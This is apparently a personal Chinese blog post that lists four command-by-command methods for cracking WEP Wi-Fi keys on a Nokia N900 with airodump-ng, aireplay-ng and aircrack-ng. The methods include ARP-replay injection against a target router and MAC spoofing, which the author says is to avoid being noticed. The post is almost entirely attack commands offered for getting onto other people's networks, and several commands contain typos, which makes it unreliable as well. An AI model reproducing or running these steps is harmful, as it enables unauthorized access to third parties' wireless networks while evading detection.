俺经常在n900上面玩无线破解,总结了一些主破解WEP密钥的方法
方法一:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng wlan0 扫描无线信号
信道 要破解的无线MAC (ivs名字,随便取)
| | |
airodump-ng –channel 1 –bssid 00:11:22:33:44:55 -w work –ivs wlan0 抓要破解无线的包。
ivs包
|
aircrack-ng work*.ivs 抓到包后开始破解。
破解完后。输入下面命令,就能上网。不然上不了网。
ifconfig wlan0 down
iwconfig wlan0 mode manger
ifconfig wlan0 up
—————————————————————————————————
方法二:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
macchanger –mac 00:11:22:33:44:55 wlan0 改自己的MAC地址。防止别人发现。
ifconfig wlan0 up
airodump-ng wlan0 抓包
信道 包的名字 要破解的无线MAC
| | |
airodump-ng -c 2 -w tmdsb –bssid 00:11:22:33:44:55 wlan0
对方MAC 自己的MAC
| |
aireplay-ng -1 0 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0 注入
对方MAC 自己的MAC
| |
aireplay-ng -3 -b 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0 开始ARP发包。
抓到包后的名字
|
aircrack-ng -P 2 tmdsb.cap 开始破解 到包达到20000就会自动破解成功。
对方MAC 抓到包后的名字
| |
或者aircrack-ng -b 11:22:33:44:55:66 tmdsb.cap
——————————————————————————————————————————————
方法三:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
macchanger –mac 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
airodump-ng wlan0
airodump-ng -c 11 -w test –bssid 00:1A:25:CF:F4:33 wlan0
aireplay-ng -1 0 -a 00:1A:25:CF:F4:33 -h 00:11:22:33:44:55 wlan0
aireplay-ng -3 -b 00:1A:25:CF:F4:33 -h 00:11:22:33:44:55 wlan0
aircrack-ng -p 2 test-01.cap
aircrack-ng -b 00:1A:25:CF:F4:33 test-01.cap
ifconfig wlan0 down
iwconfig wlan0 mode maneged
ifconfig wlan0 up
___________________________________
方法四:
ifconfig wlan0 up
iwlist wlan0 scan
ifconfig wlan0 down
iwconfig wlan0 mode monitor
macchanger -r wlan0 |grep Faked
ifconfig wlan0 up
airodump-ng -c 13 -w tmdsb wlan0
aireplay-ng -1 0 -a 00:02:CF:95:74:OD wlan0
aireplay-ng -3 -b 00:02:CF:95:74:OD wlan0
aircrack-ng tmdsb-01.cap
aireplay-ng -2 -p 0841 -a 00:1A:25:CF:F4:33 wlan0
这些命令貌似在BT4下面也是通用的吧。具体我没测试
阅读(798) | 评论(0) | 转发(0) |
